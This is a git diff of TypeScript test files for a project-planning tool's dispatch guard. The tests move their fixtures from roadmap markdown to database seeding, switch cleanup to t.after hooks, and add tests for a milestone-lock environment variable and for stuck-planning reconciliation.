+import { openDatabase, closeDatabase, insertMilestone, insertSlice } from "../gsd-db.ts";
 
-test("dispatch guard blocks when prior milestone has incomplete slices", () => {
+/** Helper: create temp dir and open an in-dir DB for dispatch-guard tests */
+function setupRepo(): string {
   const repo = mkdtempSync(join(tmpdir(), "gsd-dispatch-guard-"));
-  try {
-    mkdirSync(join(repo, ".gsd", "milestones", "M002"), { recursive: true });
-    mkdirSync(join(repo, ".gsd", "milestones", "M003"), { recursive: true });
+  mkdirSync(join(repo, ".gsd"), { recursive: true });
+  openDatabase(join(repo, ".gsd", "gsd.db"));
+  return repo;
+}
 
-    writeFileSync(join(repo, ".gsd", "milestones", "M002", "M002-ROADMAP.md"),
-      "# M002: Previous\n\n## Slices\n- [x] **S01: Done** `risk:low` `depends:[]`\n- [ ] **S02: Pending** `risk:low` `depends:[S01]`\n");
-    writeFileSync(join(repo, ".gsd", "milestones", "M003", "M003-ROADMAP.md"),
-      "# M003: Current\n\n## Slices\n- [ ] **S01: First** `risk:low` `depends:[]`\n- [ ] **S02: Second** `risk:low` `depends:[S01]`\n");
+/** Helper: tear down repo (close DB then remove dir) */
+function teardownRepo(repo: string): void {
+  closeDatabase();
+  rmSync(repo, { recursive: true, force: true });
+}
 
-    assert.equal(
-      getPriorSliceCompletionBlocker(repo, "main", "plan-slice", "M003/S01"),
-      "Cannot dispatch plan-slice M003/S01: earlier slice M002/S02 is not complete.",
-    );
-  } finally {
-    rmSync(repo, { recursive: true, force: true });
-  }
+test("dispatch guard blocks when prior milestone has incomplete slices", (t) => {
+  const repo = setupRepo();
+  t.after(() => teardownRepo(repo));
+
+  mkdirSync(join(repo, ".gsd", "milestones", "M002"), { recursive: true });
+  mkdirSync(join(repo, ".gsd", "milestones", "M003"), { recursive: true });
+
+  // Seed DB: M002 with S01 complete, S02 pending
+  insertMilestone({ id: "M002", title: "Previous" });
+  insertSlice({ id: "S01", milestoneId: "M002", title: "Done", status: "complete", depends: [], sequence: 1 });
+  insertSlice({ id: "S02", milestoneId: "M002", title: "Pending", status: "pending", depends: ["S01"], sequence: 2 });
+
+  // M003 with two pending slices
+  insertMilestone({ id: "M003", title: "Current" });
+  insertSlice({ id: "S01", milestoneId: "M003", title: "First", status: "pending", depends: [], sequence: 1 });
+  insertSlice({ id: "S02", milestoneId: "M003", title: "Second", status: "pending", depends: ["S01"], sequence: 2 });
+
+  // Need ROADMAP files for milestone discovery (findMilestoneIds reads disk)
+  writeFileSync(join(repo, ".gsd", "milestones", "M002", "M002-ROADMAP.md"), "# M002\n");
+  writeFileSync(join(repo, ".gsd", "milestones", "M003", "M003-ROADMAP.md"), "# M003\n");
+
+  assert.equal(
+    getPriorSliceCompletionBlocker(repo, "main", "plan-slice", "M003/S01"),
+    "Cannot dispatch plan-slice M003/S01: earlier slice M002/S02 is not complete.",
+  );
 });
 
-test("dispatch guard blocks later slice in same milestone when earlier incomplete", () => {
-  const repo = mkdtempSync(join(tmpdir(), "gsd-dispatch-guard-"));
-  try {
-    mkdirSync(join(repo, ".gsd", "milestones", "M002"), { recursive: true });
-    mkdirSync(join(repo, ".gsd", "milestones", "M003"), { recursive: true });
+test("dispatch guard blocks later slice in same milestone when earlier incomplete", (t) => {
+  const repo = setupRepo();
+  t.after(() => teardownRepo(repo));
 
-    writeFileSync(join(repo, ".gsd", "milestones", "M002", "M002-ROADMAP.md"),
-      "# M002: Previous\n\n## Slices\n- [x] **S01: Done** `risk:low` `depends:[]`\n- [x] **S02: Done** `risk:low` `depends:[S01]`\n");
-    writeFileSync(join(repo, ".gsd", "milestones", "M003", "M003-ROADMAP.md"),
-      "# M003: Current\n\n## Slices\n- [ ] **S01: First** `risk:low` `depends:[]`\n- [ ] **S02: Second** `risk:low` `depends:[S01]`\n");
+  mkdirSync(join(repo, ".gsd", "milestones", "M002"), { recursive: true });
+  mkdirSync(join(repo, ".gsd", "milestones", "M003"), { recursive: true });
 
-    assert.equal(
-      getPriorSliceCompletionBlocker(repo, "main", "execute-task", "M003/S02/T01"),
-      "Cannot dispatch execute-task M003/S02/T01: dependency slice M003/S01 is not complete.",
-    );
-  } finally {
-    rmSync(repo, { recursive: true, force: true });
-  }
+  insertMilestone({ id: "M002", title: "Previous" });
+  insertSlice({ id: "S01", milestoneId: "M002", title: "Done", status: "complete", depends: [], sequence: 1 });
+  insertSlice({ id: "S02", milestoneId: "M002", title: "Done", status: "complete", depends: ["S01"], sequence: 2 });
+
+  insertMilestone({ id: "M003", title: "Current" });
+  insertSlice({ id: "S01", milestoneId: "M003", title: "First", status: "pending", depends: [], sequence: 1 });
+  insertSlice({ id: "S02", milestoneId: "M003", title: "Second", status: "pending", depends: ["S01"], sequence: 2 });
+
+  writeFileSync(join(repo, ".gsd", "milestones", "M002", "M002-ROADMAP.md"), "# M002\n");
+  writeFileSync(join(repo, ".gsd", "milestones", "M003", "M003-ROADMAP.md"), "# M003\n");
+
+  assert.equal(
+    getPriorSliceCompletionBlocker(repo, "main", "execute-task", "M003/S02/T01"),
+    "Cannot dispatch execute-task M003/S02/T01: dependency slice M003/S01 is not complete.",
+  );
 });
 
-test("dispatch guard allows dispatch when all earlier slices complete", () => {
-  const repo = mkdtempSync(join(tmpdir(), "gsd-dispatch-guard-"));
-  try {
-    mkdirSync(join(repo, ".gsd", "milestones", "M003"), { recursive: true });
-    writeFileSync(join(repo, ".gsd", "milestones", "M003", "M003-ROADMAP.md"),
-      "# M003: Current\n\n## Slices\n- [x] **S01: First** `risk:low` `depends:[]`\n- [ ] **S02: Second** `risk:low` `depends:[S01]`\n");
+test("dispatch guard allows dispatch when all earlier slices complete", (t) => {
+  const repo = setupRepo();
+  t.after(() => teardownRepo(repo));
 
-    assert.equal(getPriorSliceCompletionBlocker(repo, "main", "execute-task", "M003/S02/T01"), null);
-    assert.equal(getPriorSliceCompletionBlocker(repo, "main", "plan-milestone", "M003"), null);
-  } finally {
-    rmSync(repo, { recursive: true, force: true });
-  }
+  mkdirSync(join(repo, ".gsd", "milestones", "M003"), { recursive: true });
+
+  insertMilestone({ id: "M003", title: "Current" });
+  insertSlice({ id: "S01", milestoneId: "M003", title: "First", status: "complete", depends: [], sequence: 1 });
+  insertSlice({ id: "S02", milestoneId: "M003", title: "Second", status: "pending", depends: ["S01"], sequence: 2 });
+
+  writeFileSync(join(repo, ".gsd", "milestones", "M003", "M003-ROADMAP.md"), "# M003\n");
+
+  assert.equal(getPriorSliceCompletionBlocker(repo, "main", "execute-task", "M003/S02/T01"), null);
+  assert.equal(getPriorSliceCompletionBlocker(repo, "main", "plan-milestone", "M003"), null);
 });
 
-test("dispatch guard unblocks slice when positionally-earlier slice depends on it (#1638)", () => {
+test("dispatch guard unblocks slice when positionally-earlier slice depends on it (#1638)", (t) => {
   // S05 depends on S06, but S05 appears first positionally.
   // Old behavior: S06 blocked because S05 (positionally earlier) is incomplete.
   // Fixed behavior: S06 has no unmet dependencies, so it can dispatch.
-  const repo = mkdtempSync(join(tmpdir(), "gsd-dispatch-guard-"));
-  try {
-    mkdirSync(join(repo, ".gsd", "milestones", "M001"), { recursive: true });
-    writeFileSync(join(repo, ".gsd", "milestones", "M001", "M001-ROADMAP.md"),
-      "# M001: Test\n\n## Slices\n" +
-      "- [x] **S01: Setup** `risk:low` `depends:[]`\n" +
-      "- [x] **S02: Core** `risk:low` `depends:[S01]`\n" +
-      "- [x] **S03: API** `risk:low` `depends:[S02]`\n" +
-      "- [x] **S04: Auth** `risk:low` `depends:[S03]`\n" +
-      "- [ ] **S05: Integration** `risk:high` `depends:[S04,S06]`\n" +
-      "- [ ] **S06: Data Layer** `risk:medium` `depends:[S04]`\n");
+  const repo = setupRepo();
+  t.after(() => teardownRepo(repo));
 
-    // S06 depends only on S04 (complete) — should be unblocked
-    assert.equal(
-      getPriorSliceCompletionBlocker(repo, "main", "plan-slice", "M001/S06"),
-      null,
-    );
+  mkdirSync(join(repo, ".gsd", "milestones", "M001"), { recursive: true });
 
-    // S05 depends on S04 (complete) and S06 (incomplete) — should be blocked
-    assert.equal(
-      getPriorSliceCompletionBlocker(repo, "main", "plan-slice", "M001/S05"),
-      "Cannot dispatch plan-slice M001/S05: dependency slice M001/S06 is not complete.",
-    );
-  } finally {
-    rmSync(repo, { recursive: true, force: true });
-  }
+  insertMilestone({ id: "M001", title: "Test" });
+  insertSlice({ id: "S01", milestoneId: "M001", title: "Setup", status: "complete", depends: [], sequence: 1 });
+  insertSlice({ id: "S02", milestoneId: "M001", title: "Core", status: "complete", depends: ["S01"], sequence: 2 });
+  insertSlice({ id: "S03", milestoneId: "M001", title: "API", status: "complete", depends: ["S02"], sequence: 3 });
+  insertSlice({ id: "S04", milestoneId: "M001", title: "Auth", status: "complete", depends: ["S03"], sequence: 4 });
+  insertSlice({ id: "S05", milestoneId: "M001", title: "Integration", status: "pending", depends: ["S04", "S06"], sequence: 5 });
+  insertSlice({ id: "S06", milestoneId: "M001", title: "Data Layer", status: "pending", depends: ["S04"], sequence: 6 });
+
+  writeFileSync(join(repo, ".gsd", "milestones", "M001", "M001-ROADMAP.md"), "# M001\n");
+
+  // S06 depends only on S04 (complete) — should be unblocked
+  assert.equal(
+    getPriorSliceCompletionBlocker(repo, "main", "plan-slice", "M001/S06"),
+    null,
+  );
+
+  // S05 depends on S04 (complete) and S06 (incomplete) — should be blocked
+  assert.equal(
+    getPriorSliceCompletionBlocker(repo, "main", "plan-slice", "M001/S05"),
+    "Cannot dispatch plan-slice M001/S05: dependency slice M001/S06 is not complete.",
+  );
 });
 
-test("dispatch guard falls back to positional ordering when no dependencies declared", () => {
-  const repo = mkdtempSync(join(tmpdir(), "gsd-dispatch-guard-"));
-  try {
-    mkdirSync(join(repo, ".gsd", "milestones", "M001"), { recursive: true });
-    writeFileSync(join(repo, ".gsd", "milestones", "M001", "M001-ROADMAP.md"),
-      "# M001: Test\n\n## Slices\n" +
-      "- [x] **S01: First** `risk:low` `depends:[]`\n" +
-      "- [ ] **S02: Second** `risk:low` `depends:[]`\n" +
-      "- [ ] **S03: Third** `risk:low` `depends:[]`\n");
+test("dispatch guard falls back to positional ordering when no dependencies declared", (t) => {
+  const repo = setupRepo();
+  t.after(() => teardownRepo(repo));
 
-    // S03 has no dependencies — positional fallback blocks on S02
-    assert.equal(
-      getPriorSliceCompletionBlocker(repo, "main", "plan-slice", "M001/S03"),
-      "Cannot dispatch plan-slice M001/S03: earlier slice M001/S02 is not complete.",
-    );
+  mkdirSync(join(repo, ".gsd", "milestones", "M001"), { recursive: true });
 
-    // S02 has no dependencies — positional fallback: S01 is done, so unblocked
-    assert.equal(
-      getPriorSliceCompletionBlocker(repo, "main", "plan-slice", "M001/S02"),
-      null,
-    );
-  } finally {
-    rmSync(repo, { recursive: true, force: true });
-  }
+  insertMilestone({ id: "M001", title: "Test" });
+  insertSlice({ id: "S01", milestoneId: "M001", title: "First", status: "complete", depends: [], sequence: 1 });
+  insertSlice({ id: "S02", milestoneId: "M001", title: "Second", status: "pending", depends: [], sequence: 2 });
+  insertSlice({ id: "S03", milestoneId: "M001", title: "Third", status: "pending", depends: [], sequence: 3 });
+
+  writeFileSync(join(repo, ".gsd", "milestones", "M001", "M001-ROADMAP.md"), "# M001\n");
+
+  // S03 has no dependencies — positional fallback blocks on S02
+  assert.equal(
+    getPriorSliceCompletionBlocker(repo, "main", "plan-slice", "M001/S03"),
+    "Cannot dispatch plan-slice M001/S03: earlier slice M001/S02 is not complete.",
+  );
+
+  // S02 has no dependencies — positional fallback: S01 is done, so unblocked
+  assert.equal(
+    getPriorSliceCompletionBlocker(repo, "main", "plan-slice", "M001/S02"),
+    null,
+  );
 });
 
-test("dispatch guard allows slice with all declared dependencies complete", () => {
-  const repo = mkdtempSync(join(tmpdir(), "gsd-dispatch-guard-"));
-  try {
-    mkdirSync(join(repo, ".gsd", "milestones", "M001"), { recursive: true });
-    writeFileSync(join(repo, ".gsd", "milestones", "M001", "M001-ROADMAP.md"),
-      "# M001: Test\n\n## Slices\n" +
-      "- [x] **S01: Setup** `risk:low` `depends:[]`\n" +
-      "- [x] **S02: Core** `risk:low` `depends:[S01]`\n" +
-      "- [ ] **S03: Feature A** `risk:low` `depends:[S01,S02]`\n" +
-      "- [ ] **S04: Feature B** `risk:low` `depends:[S01]`\n");
+test("dispatch guard allows slice with all declared dependencies complete", (t) => {
+  const repo = setupRepo();
+  t.after(() => teardownRepo(repo));
 
-    // S03 depends on S01 (done) and S02 (done) — unblocked
-    assert.equal(
-      getPriorSliceCompletionBlocker(repo, "main", "plan-slice", "M001/S03"),
-      null,
-    );
+  mkdirSync(join(repo, ".gsd", "milestones", "M001"), { recursive: true });
 
-    // S04 depends only on S01 (done) — unblocked even though S03 is incomplete
-    assert.equal(
-      getPriorSliceCompletionBlocker(repo, "main", "plan-slice", "M001/S04"),
-      null,
-    );
-  } finally {
-    rmSync(repo, { recursive: true, force: true });
-  }
+  insertMilestone({ id: "M001", title: "Test" });
+  insertSlice({ id: "S01", milestoneId: "M001", title: "Setup", status: "complete", depends: [], sequence: 1 });
+  insertSlice({ id: "S02", milestoneId: "M001", title: "Core", status: "complete", depends: ["S01"], sequence: 2 });
+  insertSlice({ id: "S03", milestoneId: "M001", title: "Feature A", status: "pending", depends: ["S01", "S02"], sequence: 3 });
+  insertSlice({ id: "S04", milestoneId: "M001", title: "Feature B", status: "pending", depends: ["S01"], sequence: 4 });
+
+  writeFileSync(join(repo, ".gsd", "milestones", "M001", "M001-ROADMAP.md"), "# M001\n");
+
+  // S03 depends on S01 (done) and S02 (done) — unblocked
+  assert.equal(
+    getPriorSliceCompletionBlocker(repo, "main", "plan-slice", "M001/S03"),
+    null,
+  );
+
+  // S04 depends only on S01 (done) — unblocked even though S03 is incomplete
+  assert.equal(
+    getPriorSliceCompletionBlocker(repo, "main", "plan-slice", "M001/S04"),
+    null,
+  );
 });
 
-test("dispatch guard skips completed milestone with SUMMARY even if it has unchecked remediation slices (#1716)", () => {
-  const repo = mkdtempSync(join(tmpdir(), "gsd-dispatch-guard-"));
-  try {
-    mkdirSync(join(repo, ".gsd", "milestones", "M001"), { recursive: true });
-    mkdirSync(join(repo, ".gsd", "milestones", "M002"), { recursive: true });
+test("dispatch guard skips completed milestone with SUMMARY even if it has unchecked remediation slices (#1716)", (t) => {
+  const repo = setupRepo();
+  t.after(() => teardownRepo(repo));
 
-    // M001 is complete (has SUMMARY) but has unchecked remediation slices
-    writeFileSync(join(repo, ".gsd", "milestones", "M001", "M001-ROADMAP.md"),
-      "# M001: Previous\n\n## Slices\n" +
-      "- [x] **S01: Core** `risk:low` `depends:[]`\n" +
-      "- [x] **S02: Tests** `risk:low` `depends:[S01]`\n" +
-      "- [ ] **S03-R: Remediation** `risk:low` `depends:[S02]`\n" +
-      "- [ ] **S04-R: Remediation 2** `risk:low` `depends:[S02]`\n");
-    writeFileSync(join(repo, ".gsd", "milestones", "M001", "M001-SUMMARY.md"),
-      "---\nstatus: complete\n---\n# M001 Summary\nDone.\n");
+  mkdirSync(join(repo, ".gsd", "milestones", "M001"), { recursive: true });
+  mkdirSync(join(repo, ".gsd", "milestones", "M002"), { recursive: true });
 
-    writeFileSync(join(repo, ".gsd", "milestones", "M002", "M002-ROADMAP.md"),
-      "# M002: Current\n\n## Slices\n- [ ] **S01: Start** `risk:low` `depends:[]`\n");
+  // M001 is complete (has SUMMARY) but has unchecked remediation slices in DB
+  insertMilestone({ id: "M001", title: "Previous" });
+  insertSlice({ id: "S01", milestoneId: "M001", title: "Core", status: "complete", depends: [], sequence: 1 });
+  insertSlice({ id: "S02", milestoneId: "M001", title: "Tests", status: "complete", depends: ["S01"], sequence: 2 });
+  insertSlice({ id: "S03-R", milestoneId: "M001", title: "Remediation", status: "pending", depends: ["S02"], sequence: 3 });
+  insertSlice({ id: "S04-R", milestoneId: "M001", title: "Remediation 2", status: "pending", depends: ["S02"], sequence: 4 });
 
-    // M001 has SUMMARY — should be skipped, not block M002/S01
-    assert.equal(
-      getPriorSliceCompletionBlocker(repo, "main", "plan-slice", "M002/S01"),
-      null,
-    );
-  } finally {
-    rmSync(repo, { recursive: true, force: true });
-  }
+  insertMilestone({ id: "M002", title: "Current" });
+  insertSlice({ id: "S01", milestoneId: "M002", title: "Start", status: "pending", depends: [], sequence: 1 });
+
+  // M001 SUMMARY on disk triggers skip
+  writeFileSync(join(repo, ".gsd", "milestones", "M001", "M001-ROADMAP.md"), "# M001\n");
+  writeFileSync(join(repo, ".gsd", "milestones", "M001", "M001-SUMMARY.md"),
+    "---\nstatus: complete\n---\n# M001 Summary\nDone.\n");
+  writeFileSync(join(repo, ".gsd", "milestones", "M002", "M002-ROADMAP.md"), "# M002\n");
+
+  // M001 has SUMMARY — should be skipped, not block M002/S01
+  assert.equal(
+    getPriorSliceCompletionBlocker(repo, "main", "plan-slice", "M002/S01"),
+    null,
+  );
 });
 
-test("dispatch guard works without git repo", () => {
-  const repo = mkdtempSync(join(tmpdir(), "gsd-dispatch-guard-nogit-"));
-  try {
-    mkdirSync(join(repo, ".gsd", "milestones", "M001"), { recursive: true });
-    writeFileSync(join(repo, ".gsd", "milestones", "M001", "M001-ROADMAP.md"),
-      "# M001: Test\n\n## Slices\n- [x] **S01: Done** `risk:low` `depends:[]`\n- [ ] **S02: Pending** `risk:low` `depends:[S01]`\n");
+test("dispatch guard works without git repo", (t) => {
+  const repo = setupRepo();
+  t.after(() => teardownRepo(repo));
 
-    assert.equal(getPriorSliceCompletionBlocker(repo, "main", "plan-slice", "M001/S02"), null);
-  } finally {
-    rmSync(repo, { recursive: true, force: true });
-  }
+  mkdirSync(join(repo, ".gsd", "milestones", "M001"), { recursive: true });
+
+  insertMilestone({ id: "M001", title: "Test" });
+  insertSlice({ id: "S01", milestoneId: "M001", title: "Done", status: "complete", depends: [], sequence: 1 });
+  insertSlice({ id: "S02", milestoneId: "M001", title: "Pending", status: "pending", depends: ["S01"], sequence: 2 });
+
+  writeFileSync(join(repo, ".gsd", "milestones", "M001", "M001-ROADMAP.md"), "# M001\n");
+
+  assert.equal(getPriorSliceCompletionBlocker(repo, "main", "plan-slice", "M001/S02"), null);
+});
+
+test("dispatch guard skips cross-milestone check when GSD_MILESTONE_LOCK is set (#2797)", (t) => {
+  const repo = setupRepo();
+  t.after(() => {
+    delete process.env.GSD_MILESTONE_LOCK;
+    teardownRepo(repo);
+  });
+
+  mkdirSync(join(repo, ".gsd", "milestones", "M010"), { recursive: true });
+  mkdirSync(join(repo, ".gsd", "milestones", "M011"), { recursive: true });
+  mkdirSync(join(repo, ".gsd", "milestones", "M012"), { recursive: true });
+
+  // M010 and M011 have incomplete slices
+  insertMilestone({ id: "M010", title: "Analytics" });
+  insertSlice({ id: "S01", milestoneId: "M010", title: "Data Quality", status: "pending", depends: [], sequence: 1 });
+
+  insertMilestone({ id: "M011", title: "Builder Onboarding" });
+  insertSlice({ id: "S01", milestoneId: "M011", title: "Schema", status: "pending", depends: [], sequence: 1 });
+
+  insertMilestone({ id: "M012", title: "Shared Components" });
+  insertSlice({ id: "S01", milestoneId: "M012", title: "Foundation", status: "pending", depends: [], sequence: 1 });
+  insertSlice({ id: "S02", milestoneId: "M012", title: "Migrate Pages", status: "pending", depends: ["S01"], sequence: 2 });
+
+  writeFileSync(join(repo, ".gsd", "milestones", "M010", "M010-ROADMAP.md"), "# M010\n");
+  writeFileSync(join(repo, ".gsd", "milestones", "M011", "M011-ROADMAP.md"), "# M011\n");
+  writeFileSync(join(repo, ".gsd", "milestones", "M012", "M012-ROADMAP.md"), "# M012\n");
+
+  // Without lock: M012 blocked by M010's incomplete S01
+  delete process.env.GSD_MILESTONE_LOCK;
+  assert.match(
+    getPriorSliceCompletionBlocker(repo, "main", "execute-task", "M012/S01/T01") ?? "",
+    /earlier slice M010\/S01 is not complete/,
+  );
+
+  // With lock: M012 only checks its own intra-milestone deps — S01 has none, so unblocked
+  process.env.GSD_MILESTONE_LOCK = "M012";
+  assert.equal(
+    getPriorSliceCompletionBlocker(repo, "main", "execute-task", "M012/S01/T01"),
+    null,
+  );
+
+  // With lock: M012/S02 still blocked by M012/S01 (intra-milestone dep preserved)
+  assert.equal(
+    getPriorSliceCompletionBlocker(repo, "main", "execute-task", "M012/S02/T01"),
+    "Cannot dispatch execute-task M012/S02/T01: dependency slice M012/S01 is not complete.",
+  );
 });
diff --git a/src/resources/extensions/gsd/tests/dispatch-missing-task-plans.test.ts b/src/resources/extensions/gsd/tests/dispatch-missing-task-plans.test.ts
index 1c92b64a0..d169ba6c2 100644
--- a/src/resources/extensions/gsd/tests/dispatch-missing-task-plans.test.ts
+++ b/src/resources/extensions/gsd/tests/dispatch-missing-task-plans.test.ts
@@ -71,62 +71,56 @@ function scaffoldTaskPlan(basePath: string, mid: string, sid: string, tid: strin
 
 // ─── Tests ─────────────────────────────────────────────────────────────────
 
-test("dispatch: missing task plan triggers plan-slice (not stop) — issue #909", async () => {
+test("dispatch: missing task plan triggers plan-slice (not stop) — issue #909", async (t) => {
   const tmp = mkdtempSync(join(tmpdir(), "gsd-909-"));
-  try {
-    // Slice plan exists with tasks, but tasks/ directory is empty
-    scaffoldSlicePlan(tmp, "M002", "S03");
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
 
-    const ctx = makeContext(tmp);
-    const result = await resolveDispatch(ctx);
+  // Slice plan exists with tasks, but tasks/ directory is empty
+  scaffoldSlicePlan(tmp, "M002", "S03");
 
-    assert.equal(result.action, "dispatch", "should dispatch, not stop");
-    assert.ok(result.action === "dispatch" && result.unitType === "plan-slice",
-      `unitType should be plan-slice, got: ${result.action === "dispatch" ? result.unitType : "(stop)"}`);
-    assert.ok(result.action === "dispatch" && result.unitId === "M002/S03",
-      `unitId should be M002/S03, got: ${result.action === "dispatch" ? result.unitId : "(stop)"}`);
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
+  const ctx = makeContext(tmp);
+  const result = await resolveDispatch(ctx);
+
+  assert.equal(result.action, "dispatch", "should dispatch, not stop");
+  assert.ok(result.action === "dispatch" && result.unitType === "plan-slice",
+    `unitType should be plan-slice, got: ${result.action === "dispatch" ? result.unitType : "(stop)"}`);
+  assert.ok(result.action === "dispatch" && result.unitId === "M002/S03",
+    `unitId should be M002/S03, got: ${result.action === "dispatch" ? result.unitId : "(stop)"}`);
 });
 
-test("dispatch: present task plan proceeds to execute-task normally", async () => {
+test("dispatch: present task plan proceeds to execute-task normally", async (t) => {
   const tmp = mkdtempSync(join(tmpdir(), "gsd-909-ok-"));
-  try {
-    scaffoldSlicePlan(tmp, "M002", "S03");
-    scaffoldTaskPlan(tmp, "M002", "S03", "T01");
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
 
-    const ctx = makeContext(tmp);
-    const result = await resolveDispatch(ctx);
+  scaffoldSlicePlan(tmp, "M002", "S03");
+  scaffoldTaskPlan(tmp, "M002", "S03", "T01");
 
-    assert.equal(result.action, "dispatch");
-    assert.ok(result.action === "dispatch" && result.unitType === "execute-task",
-      `unitType should be execute-task, got: ${result.action === "dispatch" ? result.unitType : "(stop)"}`);
-    assert.ok(result.action === "dispatch" && result.unitId === "M002/S03/T01",
-      `unitId should be M002/S03/T01, got: ${result.action === "dispatch" ? result.unitId : "(stop)"}`);
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
+  const ctx = makeContext(tmp);
+  const result = await resolveDispatch(ctx);
+
+  assert.equal(result.action, "dispatch");
+  assert.ok(result.action === "dispatch" && result.unitType === "execute-task",
+    `unitType should be execute-task, got: ${result.action === "dispatch" ? result.unitType : "(stop)"}`);
+  assert.ok(result.action === "dispatch" && result.unitId === "M002/S03/T01",
+    `unitId should be M002/S03/T01, got: ${result.action === "dispatch" ? result.unitId : "(stop)"}`);
 });
 
-test("dispatch: plan-slice recovery loop — second call after plan-slice still recovers cleanly", async () => {
+test("dispatch: plan-slice recovery loop — second call after plan-slice still recovers cleanly", async (t) => {
   // Simulate: plan-slice ran but T01-PLAN.md is still missing (e.g. agent crashed mid-write).
   // Dispatch should still re-dispatch plan-slice, not hard-stop.
   const tmp = mkdtempSync(join(tmpdir(), "gsd-909-loop-"));
-  try {
-    scaffoldSlicePlan(tmp, "M002", "S03");
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
 
-    const ctx = makeContext(tmp);
-    const r1 = await resolveDispatch(ctx);
-    assert.equal(r1.action, "dispatch");
-    assert.ok(r1.action === "dispatch" && r1.unitType === "plan-slice");
+  scaffoldSlicePlan(tmp, "M002", "S03");
 
-    // Still no task plan written — dispatch again
-    const r2 = await resolveDispatch(ctx);
-    assert.equal(r2.action, "dispatch");
-    assert.ok(r2.action === "dispatch" && r2.unitType === "plan-slice",
-      "should keep dispatching plan-slice until task plans appear");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
+  const ctx = makeContext(tmp);
+  const r1 = await resolveDispatch(ctx);
+  assert.equal(r1.action, "dispatch");
+  assert.ok(r1.action === "dispatch" && r1.unitType === "plan-slice");
+
+  // Still no task plan written — dispatch again
+  const r2 = await resolveDispatch(ctx);
+  assert.equal(r2.action, "dispatch");
+  assert.ok(r2.action === "dispatch" && r2.unitType === "plan-slice",
+    "should keep dispatching plan-slice until task plans appear");
 });
diff --git a/src/resources/extensions/gsd/tests/dispatch-uat-last-completed.test.ts b/src/resources/extensions/gsd/tests/dispatch-uat-last-completed.test.ts
index d64c3f683..4a014d4ae 100644
--- a/src/resources/extensions/gsd/tests/dispatch-uat-last-completed.test.ts
+++ b/src/resources/extensions/gsd/tests/dispatch-uat-last-completed.test.ts
@@ -66,7 +66,7 @@ function createFixture(): string {
   return base;
 }
 
-test("dispatch uat targets last completed slice, not activeSlice (#1693)", async () => {
+test("dispatch uat targets last completed slice, not activeSlice (#1693)", async (t) => {
   const base = createFixture();
   invalidateStateCache();
 
@@ -88,31 +88,29 @@ test("dispatch uat targets last completed slice, not activeSlice (#1693)", async
     },
   } as any;
 
-  try {
-    await dispatchDirectPhase(ctx, pi, "uat", base);
+  t.after(() => rmSync(base, { recursive: true, force: true }));
 
-    // Should have dispatched (sendMessage called)
-    assert.ok(sentPrompt, "sendMessage should have been called with a prompt");
+  await dispatchDirectPhase(ctx, pi, "uat", base);
 
-    // The dispatch notification should reference M001/S01 (completed), not M001/S02 (active)
-    const dispatchNotification = notifications.find(n => n.message.startsWith("Dispatching"));
-    assert.ok(dispatchNotification, "dispatch notification should be present");
-    assert.match(
-      dispatchNotification.message,
-      /M001\/S01/,
-      "dispatch should target completed slice S01, not active slice S02",
-    );
-    assert.doesNotMatch(
-      dispatchNotification.message,
-      /M001\/S02/,
-      "dispatch should NOT target active (next incomplete) slice S02",
-    );
-  } finally {
-    rmSync(base, { recursive: true, force: true });
-  }
+  // Should have dispatched (sendMessage called)
+  assert.ok(sentPrompt, "sendMessage should have been called with a prompt");
+
+  // The dispatch notification should reference M001/S01 (completed), not M001/S02 (active)
+  const dispatchNotification = notifications.find(n => n.message.startsWith("Dispatching"));
+  assert.ok(dispatchNotification, "dispatch notification should be present");
+  assert.match(
+    dispatchNotification.message,
+    /M001\/S01/,
+    "dispatch should target completed slice S01, not active slice S02",
+  );
+  assert.doesNotMatch(
+    dispatchNotification.message,
+    /M001\/S02/,
+    "dispatch should NOT target active (next incomplete) slice S02",
+  );
 });
 
-test("dispatch uat warns when no completed slices exist", async () => {
+test("dispatch uat warns when no completed slices exist", async (t) => {
   const base = mkdtempSync(join(tmpdir(), "gsd-dispatch-uat-none-"));
   invalidateStateCache();
 
@@ -164,13 +162,11 @@ test("dispatch uat warns when no completed slices exist", async () => {
     },
   } as any;
 
-  try {
-    await dispatchDirectPhase(ctx, pi, "uat", base);
+  t.after(() => rmSync(base, { recursive: true, force: true }));
 
-    const warning = notifications.find(n => n.level === "warning");
-    assert.ok(warning, "should show a warning notification");
-    assert.match(warning.message, /no completed slices/, "warning should mention no completed slices");
-  } finally {
-    rmSync(base, { recursive: true, force: true });
-  }
+  await dispatchDirectPhase(ctx, pi, "uat", base);
+
+  const warning = notifications.find(n => n.level === "warning");
+  assert.ok(warning, "should show a warning notification");
+  assert.match(warning.message, /no completed slices/, "warning should mention no completed slices");
 });
diff --git a/src/resources/extensions/gsd/tests/dispatcher-stuck-planning.test.ts b/src/resources/extensions/gsd/tests/dispatcher-stuck-planning.test.ts
new file mode 100644
index 000000000..27dd0686a
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/dispatcher-stuck-planning.test.ts
@@ -0,0 +1,37 @@
+/**
+ * dispatcher-stuck-planning.test.ts — #3656
+ *
+ * Verify that state.ts contains the disk-to-DB task reconciliation logic
+ * that prevents the dispatcher from getting stuck in an infinite planning
+ * loop when the planner writes a PLAN.md but never calls the persistence
+ * tool, leaving the DB with zero task rows.
+ */
+
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const sourceFile = join(__dirname, "..", "state.ts");
+
+describe("dispatcher stuck-planning reconciliation (#3656)", () => {
+  const source = readFileSync(sourceFile, "utf-8");
+
+  test("imports insertTask from gsd-db", () => {
+    assert.match(source, /import\s*\{[^}]*insertTask[^}]*\}\s*from/);
+  });
+
+  test("contains plan-file task reconciliation block", () => {
+    assert.match(source, /tasks\.length\s*===\s*0\s*&&\s*planFile/);
+  });
+
+  test("calls insertTask for each disk plan task", () => {
+    assert.match(source, /insertTask\(\{/);
+  });
+
+  test("references issue #3600 in reconciliation comment", () => {
+    assert.match(source, /#3600/);
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/dist-redirect.mjs b/src/resources/extensions/gsd/tests/dist-redirect.mjs
